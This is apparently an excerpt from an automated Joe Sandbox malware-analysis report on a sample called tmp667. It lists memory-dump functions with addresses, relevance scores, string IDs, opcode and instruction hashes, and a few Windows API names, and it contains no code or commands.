                                                                                                • Source File: 00000005.00000002.446508934.00000000006D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 006D0000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_5_2_6d0000_tmp667.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID: 0$0$$
                                                                                                • API String ID: 0-2365821624
                                                                                                • Opcode ID: 04702c5b753c765933a7dd8ad8ea6a47ec8935bbfac384347ff936f8516903e3
                                                                                                • Instruction ID: 04a2966c1b6508ad622022106385ad06cca826f45ba6533719390ea0ad72af7c
                                                                                                • Opcode Fuzzy Hash: 04702c5b753c765933a7dd8ad8ea6a47ec8935bbfac384347ff936f8516903e3
                                                                                                • Instruction Fuzzy Hash: D4E04F71C1624CAFE706EBA49921B9E7BA9EB16344F1044F6D808D7251EA315E18CBD2
                                                                                                Function 001CFAC8 Relevance: 2.9, Strings: 2, Instructions: 353COMMON
                                                                                                Download Yara Rule
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000005.00000002.445795160.00000000001C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 001C0000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_5_2_1c0000_tmp667.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID: (!p$d
                                                                                                • API String ID: 0-1322973597
                                                                                                • Opcode ID: c293839f873bcd637f5f36a997ab5302267ecd4d3c026c3763db852b0a5d7031
                                                                                                • Instruction ID: b17e9ec0d7d3e1b2b9bc04ec629f5fffe34586bf5785db6ef647036b0bd8bd67
                                                                                                • Opcode Fuzzy Hash: c293839f873bcd637f5f36a997ab5302267ecd4d3c026c3763db852b0a5d7031
                                                                                                • Instruction Fuzzy Hash: 53D16A346006058FCB24CF68C494EAAB7F2FF99310B25896DD85A9B361DB30FC46CB94
                                                                                                Function 006DFA2B Relevance: 2.7, Strings: 2, Instructions: 235COMMON
                                                                                                Download Yara Rule
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000005.00000002.446508934.00000000006D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 006D0000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_5_2_6d0000_tmp667.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID: |*6$oV
                                                                                                • API String ID: 0-932278511
                                                                                                • Opcode ID: 305e78cd60b4da7c8ff78c3767a920cd5dc7d074106a6868fd05165035a51d38
                                                                                                • Instruction ID: 76f6963f4c17926f813ad4c0d2e71bac5dfaec1a4166da76a35ae9f6ab3e7a1c
                                                                                                • Opcode Fuzzy Hash: 305e78cd60b4da7c8ff78c3767a920cd5dc7d074106a6868fd05165035a51d38
                                                                                                • Instruction Fuzzy Hash: 22B10974E04218CFDB54DFA4D854BADBBF6EB49300F2090AAE41AAB395CB345D85CF11
                                                                                                Function 00D5D939 Relevance: 2.7, Strings: 2, Instructions: 182COMMON
                                                                                                Download Yara Rule
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000005.00000002.446656192.0000000000D50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00D50000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_5_2_d50000_tmp667.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID: (!p$H!p
                                                                                                • API String ID: 0-1960402415
                                                                                                • Opcode ID: 2ff18419673284651cf58688d9ed3ba71607af054581d1aa3e6325890895e9a6
                                                                                                • Instruction ID: ec4dc332afc3ec3c1a9a82d5ab99f74b1c2246025d54bdea56f43d3e843eb221
                                                                                                • Opcode Fuzzy Hash: 2ff18419673284651cf58688d9ed3ba71607af054581d1aa3e6325890895e9a6
                                                                                                • Instruction Fuzzy Hash: 3C518B303143108FDB29AB34D86562E7BA3AF85301B25457EE906CB3A5CF35AC06CB66
                                                                                                Function 006D2BF8 Relevance: 2.7, Strings: 2, Instructions: 167COMMON
                                                                                                Download Yara Rule
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000005.00000002.446508934.00000000006D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 006D0000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_5_2_6d0000_tmp667.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID: TJ"p$oV
                                                                                                • API String ID: 0-2444350933
                                                                                                • Opcode ID: 04d6ea82c79f656f6f1d867b62eb3bb26da2f956a310b8c36595d2589554bcba
                                                                                                • Instruction ID: d1f25ae8405a2b1638ef870b4513d08ddfa01bc8478a3474a6d92f1ef28e6407
                                                                                                • Opcode Fuzzy Hash: 04d6ea82c79f656f6f1d867b62eb3bb26da2f956a310b8c36595d2589554bcba
                                                                                                • Instruction Fuzzy Hash: 22711CB4E04208DFDB44EFA8E59469EBBB6FB99300F20802AE415A7398DB745D46CF50
                                                                                                Function 006D2C08 Relevance: 2.7, Strings: 2, Instructions: 164COMMON
                                                                                                Download Yara Rule
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000005.00000002.446508934.00000000006D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 006D0000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_5_2_6d0000_tmp667.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID: TJ"p$oV
                                                                                                • API String ID: 0-2444350933
                                                                                                • Opcode ID: a7b26038d0380266fde0b35e6c57b585c89b6926b22ae3640db21b46da36aa5a
                                                                                                • Instruction ID: aac2a34fea4063b4b3baae378d56483dace570ef88c42205c793de6cbd56b794
                                                                                                • Opcode Fuzzy Hash: a7b26038d0380266fde0b35e6c57b585c89b6926b22ae3640db21b46da36aa5a
                                                                                                • Instruction Fuzzy Hash: 02711A74E04208DFDB44EFA8E59469EBBB6FB99300F20802AE415B7398DB746D46DF50
                                                                                                Function 00D5433B Relevance: 2.5, Strings: 2, Instructions: 47COMMON
                                                                                                Download Yara Rule
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000005.00000002.446656192.0000000000D50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00D50000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_5_2_d50000_tmp667.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID: 0$$"
                                                                                                • API String ID: 0-3959713478
                                                                                                • Opcode ID: ceede31568ca6f680ceb2dd6ff8164b89dda642ca9d32d08af82c5187000e256
                                                                                                • Instruction ID: fa419e2187d3f1f1d9345a4e27b27d8f4d19393417c4dcf8175e49200e66deb5
                                                                                                • Opcode Fuzzy Hash: ceede31568ca6f680ceb2dd6ff8164b89dda642ca9d32d08af82c5187000e256
                                                                                                • Instruction Fuzzy Hash: 4521A274A016288FDB64DF28E858BDABBF1BB4A301F5041E9E50EA7260DB305E80CF51
                                                                                                Function 05400445 Relevance: 2.5, Strings: 2, Instructions: 35COMMON
                                                                                                Download Yara Rule
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000005.00000002.452343355.0000000005400000.00000040.00000800.00020000.00000000.sdmp, Offset: 05400000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_5_2_5400000_tmp667.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID: 5$oV
                                                                                                • API String ID: 0-3111449219
                                                                                                • Opcode ID: 44dd4ab95cec8463ba898760afca732d47e3f707fbeddc3d643e624795f88b06
                                                                                                • Instruction ID: 52ae2524823aab02aef58aac348ed1d7146091273a9a35838577d1123004c2c3
                                                                                                • Opcode Fuzzy Hash: 44dd4ab95cec8463ba898760afca732d47e3f707fbeddc3d643e624795f88b06
                                                                                                • Instruction Fuzzy Hash: B611E578A05228CFCB65EF18D948A99B7F5FB89300F1090E6A84DA7788DB345F81CF51
                                                                                                Function 006D3369 Relevance: 2.5, Strings: 2, Instructions: 27COMMON
                                                                                                Download Yara Rule
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000005.00000002.446508934.00000000006D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 006D0000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_5_2_6d0000_tmp667.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID: 0$0
                                                                                                • API String ID: 0-203156872
                                                                                                • Opcode ID: 7be2e430d99cdbbcce6e9859cf5de52a92697309b0c42610900447191bb4999d
                                                                                                • Instruction ID: 1c335ae3da504c034e36a4cef39acd111d4a2b47fee8f4c61bf4074789d5bc94
                                                                                                • Opcode Fuzzy Hash: 7be2e430d99cdbbcce6e9859cf5de52a92697309b0c42610900447191bb4999d
                                                                                                • Instruction Fuzzy Hash: A0F01C74D05248EFC740DFA8D95579DBBB5EB49304F10C5EA8C1893341EA359E06CF91
                                                                                                Function 05400EA3 Relevance: 2.5, Strings: 2, Instructions: 25COMMON
                                                                                                Download Yara Rule
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000005.00000002.452343355.0000000005400000.00000040.00000800.00020000.00000000.sdmp, Offset: 05400000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_5_2_5400000_tmp667.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID: 6$oV
                                                                                                • API String ID: 0-2291984414
                                                                                                • Opcode ID: e970c49d6638413a1d612efccf4434fc904ebc6e271fa023b9111b683f124c88
                                                                                                • Instruction ID: e4fddcce267682ee8c4caa2993a0792e0b01bc0fba76d724a5f8f7a974666208
                                                                                                • Opcode Fuzzy Hash: e970c49d6638413a1d612efccf4434fc904ebc6e271fa023b9111b683f124c88
                                                                                                • Instruction Fuzzy Hash: 99F030746081148FD765EF68D858A9AB7B6EB89304F1050E6A51DA7385CB349F91CF10
                                                                                                Function 0498DD40 Relevance: 1.6, APIs: 1, Instructions: 96memoryCOMMON
                                                                                                Download Yara Rule
                                                                                                APIs
                                                                                                • VirtualProtect.KERNELBASE(?,?,?,?), ref: 0498DDE4
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000005.00000002.451858888.0000000004980000.00000040.00000800.00020000.00000000.sdmp, Offset: 04980000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_5_2_4980000_tmp667.jbxd
                                                                                                Similarity
                                                                                                • API ID: ProtectVirtual
                                                                                                • String ID:
                                                                                                • API String ID: 544645111-0
                                                                                                • Opcode ID: 6a995981c4c3c389641b8511b9e3b515d374ba7647d7042fa8e91c09ce7100b0
                                                                                                • Instruction ID: f70335fd00785d36bdc546c2030d8654c69769eb1e7ba2834ca9f2e1186818c7
                                                                                                • Opcode Fuzzy Hash: 6a995981c4c3c389641b8511b9e3b515d374ba7647d7042fa8e91c09ce7100b0
                                                                                                • Instruction Fuzzy Hash: 4631A7B8D002089FDF14CFA9D984AEEFBB1BF49310F20942AE814BB210D735A945CF54
                                                                                                Function 006FF710 Relevance: 1.6, APIs: 1, Instructions: 83COMMON
                                                                                                Download Yara Rule
                                                                                                APIs
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000005.00000002.446542643.00000000006F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 006F0000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_5_2_6f0000_tmp667.jbxd
                                                                                                Similarity
                                                                                                • API ID: Sleep
                                                                                                • String ID:
                                                                                                • API String ID: 3472027048-0
                                                                                                • Opcode ID: c35d2401191e240c33774ef4a1905e4622588735c0bcdad786dcac494ecf4562
                                                                                                • Instruction ID: 9105d9ee88aabaa1852992cef8cf586348d82a8ddf2603e842dcb05e0e1c47a0
                                                                                                • Opcode Fuzzy Hash: c35d2401191e240c33774ef4a1905e4622588735c0bcdad786dcac494ecf4562
                                                                                                • Instruction Fuzzy Hash: B931CCB4D012189FDB10CFA9D984AEEFBF5BF49310F24942AE804B7210C735A945CF55
                                                                                                Function 00D5F968 Relevance: 1.6, Strings: 1, Instructions: 318COMMON
                                                                                                Download Yara Rule
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000005.00000002.446656192.0000000000D50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00D50000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_5_2_d50000_tmp667.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID: oV
                                                                                                • API String ID: 0-2220627765
                                                                                                • Opcode ID: 54e1e440b9225e6f85b985e8dbd0dc3a7d06499aaf9f9f8ff88bdf4f35124b39
                                                                                                • Instruction ID: 07887359e6001096c45e8478543e8b74ae62f5db65aeecb3c12c4a1744b672fa
                                                                                                • Opcode Fuzzy Hash: 54e1e440b9225e6f85b985e8dbd0dc3a7d06499aaf9f9f8ff88bdf4f35124b39
                                                                                                • Instruction Fuzzy Hash: 82C11770B002148FDB04DF69C894AAEBBF6AF89311F1540A9E905DF3A5DB70DD45CBA1
                                                                                                Function 006B99A8 Relevance: 1.6, Strings: 1, Instructions: 317COMMON
                                                                                                Download Yara Rule
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000005.00000002.446459058.00000000006B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 006B0000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_5_2_6b0000_tmp667.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID: oV
                                                                                                • API String ID: 0-2220627765
                                                                                                • Opcode ID: a4c01ba4660d9c0156d07adb4d07ffa4e051cf3261ed74f546d5dad6dbb74e51
                                                                                                • Instruction ID: cc9535de10f755d5058b118e1e7b5f4305c27b53255dc1fa7c73e91728d7eaeb
                                                                                                • Opcode Fuzzy Hash: a4c01ba4660d9c0156d07adb4d07ffa4e051cf3261ed74f546d5dad6dbb74e51
                                                                                                • Instruction Fuzzy Hash: 8DE1FAB4A05218CFDB54EFA5D884BEDB7B6FB89300F2090AAE509A7359DB305D85CF11
                                                                                                Function 006B9999 Relevance: 1.6, Strings: 1, Instructions: 305COMMON
                                                                                                Download Yara Rule
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000005.00000002.446459058.00000000006B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 006B0000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_5_2_6b0000_tmp667.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID: oV
                                                                                                • API String ID: 0-2220627765
                                                                                                • Opcode ID: 08061ff9bdf870198350e88f7286e0865e30cd208982c337d173fa5293055f69
                                                                                                • Instruction ID: 993dd5c30734f9b9c4260e22ac2f0d0ae1c325de7ff2cdd9bf151e674b381624
                                                                                                • Opcode Fuzzy Hash: 08061ff9bdf870198350e88f7286e0865e30cd208982c337d173fa5293055f69
                                                                                                • Instruction Fuzzy Hash: 9DE10CB4A05218CFDB54EFA4D984BADBBB6FB89300F2090A9E509A7359DB305D85CF11
                                                                                                Function 006B9AD0 Relevance: 1.5, Strings: 1, Instructions: 292COMMON
                                                                                                Download Yara Rule
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000005.00000002.446459058.00000000006B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 006B0000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_5_2_6b0000_tmp667.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID: oV
                                                                                                • API String ID: 0-2220627765
                                                                                                • Opcode ID: c3f29e9d7db52045ed263fcc322714dc4c742b16b8dcd11c3e0a2953c0974429
                                                                                                • Instruction ID: 7696bdedf9b5cf36ca015a2ec10b95bb1a3c172cdf05d596336aa436c27bcf19
                                                                                                • Opcode Fuzzy Hash: c3f29e9d7db52045ed263fcc322714dc4c742b16b8dcd11c3e0a2953c0974429
                                                                                                • Instruction Fuzzy Hash: A8D10BB4A05218CFDB54EFA4D984BEDB7B6FB89300F2090AAE509A7359DB305D85CF11
                                                                                                Function 00424288 Relevance: 1.5, APIs: 1, Instructions: 36libraryCOMMON
                                                                                                Download Yara Rule
                                                                                                APIs
                                                                                                • LdrInitializeThunk.NTDLL(70D67560,00000001,00000000,00000000), ref: 004242BD
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000005.00000002.446025452.0000000000420000.00000040.00000800.00020000.00000000.sdmp, Offset: 00420000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_5_2_420000_tmp667.jbxd
                                                                                                Similarity
                                                                                                • API ID: InitializeThunk
                                                                                                • String ID:
                                                                                                • API String ID: 2994545307-0
                                                                                                • Opcode ID: 97deba14cd9a2d4c6bc7df53289b0d984aa4f57257f9e6c0d1542886dd3719c8
                                                                                                • Instruction ID: e3bc08507b0bbd8370b954ef42bf68819396f860cd22d32e4448a98073b7e290
                                                                                                • Opcode Fuzzy Hash: 97deba14cd9a2d4c6bc7df53289b0d984aa4f57257f9e6c0d1542886dd3719c8
                                                                                                • Instruction Fuzzy Hash: 9CF055306853A8EFE22087625C6CFAF3F68DB82784F10809BB444062D2C27C6806C775
                                                                                                Function 006B9B91 Relevance: 1.5, Strings: 1, Instructions: 279COMMON
                                                                                                Download Yara Rule
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000005.00000002.446459058.00000000006B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 006B0000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_5_2_6b0000_tmp667.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID: oV
                                                                                                • API String ID: 0-2220627765
                                                                                                • Opcode ID: 0fb2235e968ac882f3b6e2fa4c8c89ce4fca867fd04eb952ce7691945f553d6c
                                                                                                • Instruction ID: e69e2336a4162e097f51e57772cfe7e29445aa8ac553f5cecb51a2aba53974ac
                                                                                                • Opcode Fuzzy Hash: 0fb2235e968ac882f3b6e2fa4c8c89ce4fca867fd04eb952ce7691945f553d6c
                                                                                                • Instruction Fuzzy Hash: 83D11DB4A05218CFDB54EF64E984BEDBBB6FB89300F2050AAE509A7359DB305D85CF11
                                                                                                Function 006B761C Relevance: 1.5, Strings: 1, Instructions: 252COMMON
                                                                                                Download Yara Rule
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000005.00000002.446459058.00000000006B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 006B0000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_5_2_6b0000_tmp667.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID: oV
                                                                                                • API String ID: 0-2220627765
                                                                                                • Opcode ID: afa4cd871325782f4dade11a8b3c1fe22cbc28464a5a7757cdeba81cb31cdee2
                                                                                                • Instruction ID: 440b399a90493d9e4f96df0ba7409ccea20091d04cb50c5a1ed056f79cfbb6d4
                                                                                                • Opcode Fuzzy Hash: afa4cd871325782f4dade11a8b3c1fe22cbc28464a5a7757cdeba81cb31cdee2
                                                                                                • Instruction Fuzzy Hash: 2BB1E3B4A09228CFDB64DFA8D884BDDB7F6BB89300F20916AD419A7355D7745D86CF00
                                                                                                Function 006B4FB5 Relevance: 1.5, Strings: 1, Instructions: 212COMMON
                                                                                                Download Yara Rule
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000005.00000002.446459058.00000000006B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 006B0000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_5_2_6b0000_tmp667.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID: oV
                                                                                                • API String ID: 0-2220627765
                                                                                                • Opcode ID: c20c91f51fd09048ab57bbd39b7449b8289d50ead279e14a4b786f4077f0cab0
                                                                                                • Instruction ID: a788c749276eb9853509e3778a96a2833a65e64e362015a7f841a23e38a8b64d
                                                                                                • Opcode Fuzzy Hash: c20c91f51fd09048ab57bbd39b7449b8289d50ead279e14a4b786f4077f0cab0
                                                                                                • Instruction Fuzzy Hash: DCA1E4B4A05228CFDB64EF18D848BDDB7B6FB89304F1090E6E419A7395DB749E858F40
                                                                                                Function 006B8250 Relevance: 1.5, Strings: 1, Instructions: 207COMMON
                                                                                                Download Yara Rule
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000005.00000002.446459058.00000000006B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 006B0000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_5_2_6b0000_tmp667.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID: oV
                                                                                                • API String ID: 0-2220627765
                                                                                                • Opcode ID: 06a9ca52eff64c515c6131ce8449a446d35cf744ab7a7cabf1da3bcd4b3c5386
                                                                                                • Instruction ID: b80c0bad627d93275ad10be9bccae100ddea89044413eefcc9ef64d44e830e4d
                                                                                                • Opcode Fuzzy Hash: 06a9ca52eff64c515c6131ce8449a446d35cf744ab7a7cabf1da3bcd4b3c5386
                                                                                                • Instruction Fuzzy Hash: FF9103B4D05218CFDB50DFA5D8847EDBBFABB89300F24916AD008A7359EB755986CF40
                                                                                                Function 006B5382 Relevance: 1.5, Strings: 1, Instructions: 207COMMON
                                                                                                Download Yara Rule
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000005.00000002.446459058.00000000006B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 006B0000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_5_2_6b0000_tmp667.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID: oV
                                                                                                • API String ID: 0-2220627765
                                                                                                • Opcode ID: 04742f8b499ba5d3929bdcbf2c1a38aa5cfca3ff980ef35587c53417bdd4c486
                                                                                                • Instruction ID: 648aa83400a3b24feb47a75d5f5bbaa739f7add464c5532a6c839e71d4875cf7
                                                                                                • Opcode Fuzzy Hash: 04742f8b499ba5d3929bdcbf2c1a38aa5cfca3ff980ef35587c53417bdd4c486
                                                                                                • Instruction Fuzzy Hash: DFA1F3B4A05228CFDB64EF18D948BEDB7B6FB49304F1080EAE419A7395CB745E818F40
                                                                                                Function 006B8260 Relevance: 1.5, Strings: 1, Instructions: 206COMMON
                                                                                                Download Yara Rule
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000005.00000002.446459058.00000000006B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 006B0000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_5_2_6b0000_tmp667.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID: oV
                                                                                                • API String ID: 0-2220627765
                                                                                                • Opcode ID: 0ed835170195e110e4cfabb46fe6c91fe08fb971d9979607fd4f0538887e288c
                                                                                                • Instruction ID: b697959b2613d646fa3ae222571cd4a376ef1a01a5a77230f8b38c45d514ddee
                                                                                                • Opcode Fuzzy Hash: 0ed835170195e110e4cfabb46fe6c91fe08fb971d9979607fd4f0538887e288c
                                                                                                • Instruction Fuzzy Hash: B791F2B4D05218CFDB60DFA9D8847EDBBFABB89300F24916AD008A7355EB755986CF40
                                                                                                Function 006B5140 Relevance: 1.5, Strings: 1, Instructions: 205COMMON
                                                                                                Download Yara Rule
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000005.00000002.446459058.00000000006B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 006B0000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_5_2_6b0000_tmp667.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID: oV
                                                                                                • API String ID: 0-2220627765
                                                                                                • Opcode ID: 0c4e33c91de324a5c2a3610f1ab85d1ac0ed0e45bf93f056d80d1e1b6ee09738
                                                                                                • Instruction ID: c32ae700144c104d019c4c55e78eadf4da787fc6f27496081fd06bbeb90f4fae
                                                                                                • Opcode Fuzzy Hash: 0c4e33c91de324a5c2a3610f1ab85d1ac0ed0e45bf93f056d80d1e1b6ee09738
                                                                                                • Instruction Fuzzy Hash: C3A1C2B4A05228CFDB64EF18D948BEDB7B6BB89304F1050EAE419A7395DB745EC18F40
                                                                                                Function 006B586D Relevance: 1.4, Strings: 1, Instructions: 197COMMON
                                                                                                Download Yara Rule
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000005.00000002.446459058.00000000006B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 006B0000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_5_2_6b0000_tmp667.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID: oV
                                                                                                • API String ID: 0-2220627765
                                                                                                • Opcode ID: 9618ee45f4bc5e3f4f0594f51da70f215bd846c27dc342a8bae790089ca63f88
                                                                                                • Instruction ID: 4e2b145236843545aa511fe55388aef119ff7a29e61a2ff8b848914c22c3d944
                                                                                                • Opcode Fuzzy Hash: 9618ee45f4bc5e3f4f0594f51da70f215bd846c27dc342a8bae790089ca63f88
                                                                                                • Instruction Fuzzy Hash: 2791E5B4A05228CFDB64EF18D948BDDB7B6BB49304F1090EAE419A7395CB749E818F40
                                                                                                Function 006B5565 Relevance: 1.4, Strings: 1, Instructions: 189COMMON
                                                                                                Download Yara Rule
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000005.00000002.446459058.00000000006B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 006B0000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_5_2_6b0000_tmp667.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID: oV
                                                                                                • API String ID: 0-2220627765
                                                                                                • Opcode ID: f27a3ea49a91066e4179dee9a9e0100d4c3779a1c9feddc445b915c9cc8a1ef0
                                                                                                • Instruction ID: 1e627da34bb024710f6f3b5ad6d0c2c809ed1aa21d83e874c8a220b4b8d0074e
                                                                                                • Opcode Fuzzy Hash: f27a3ea49a91066e4179dee9a9e0100d4c3779a1c9feddc445b915c9cc8a1ef0
                                                                                                • Instruction Fuzzy Hash: 9B91E3B4A05228CFDB64EF18D848BDDB7B6BB49304F1090EAE419A7395DB745EC58F40
                                                                                                Function 006B526B Relevance: 1.4, Strings: 1, Instructions: 182COMMON
                                                                                                Download Yara Rule
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000005.00000002.446459058.00000000006B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 006B0000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_5_2_6b0000_tmp667.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID: oV
                                                                                                • API String ID: 0-2220627765
                                                                                                • Opcode ID: 150683ce3a1c67ffa6b1b7a8f4bb9dc89970c3dd8a38334d91a78f6ce76f4bc3
                                                                                                • Instruction ID: a33b9b591337fcdf19f4dfa479b202bed8f8fd5da13760ba923103522b1a1a06
                                                                                                • Opcode Fuzzy Hash: 150683ce3a1c67ffa6b1b7a8f4bb9dc89970c3dd8a38334d91a78f6ce76f4bc3
                                                                                                • Instruction Fuzzy Hash: 5991D3B4A05228CFEB64DF18D848BEDB7B6BB49304F1090EAE419A7395CB745EC18F50
                                                                                                Function 006B5758 Relevance: 1.4, Strings: 1, Instructions: 179COMMON
                                                                                                Download Yara Rule
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000005.00000002.446459058.00000000006B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 006B0000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_5_2_6b0000_tmp667.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID: oV
                                                                                                • API String ID: 0-2220627765
                                                                                                • Opcode ID: 8b507d4f019cfa5e2f90167131621fe52f6dec5365a873cb6b57723dc65f6570
                                                                                                • Instruction ID: 3f095200dfdd0a0269e58e4908811439f57ab9268c7109c3952c768e3d775c7e
                                                                                                • Opcode Fuzzy Hash: 8b507d4f019cfa5e2f90167131621fe52f6dec5365a873cb6b57723dc65f6570
                                                                                                • Instruction Fuzzy Hash: DB8106B4A05228CFDB64EF18D948BDEB7B6BB49304F1050E6E419A7395DB745EC18F40
                                                                                                Function 006B5025 Relevance: 1.4, Strings: 1, Instructions: 177COMMON
                                                                                                Download Yara Rule
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000005.00000002.446459058.00000000006B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 006B0000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_5_2_6b0000_tmp667.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID: oV
                                                                                                • API String ID: 0-2220627765
                                                                                                • Opcode ID: 42385160cace02867fb9db383a35ca92361458b6fa003c78cb9fc0539597b54e
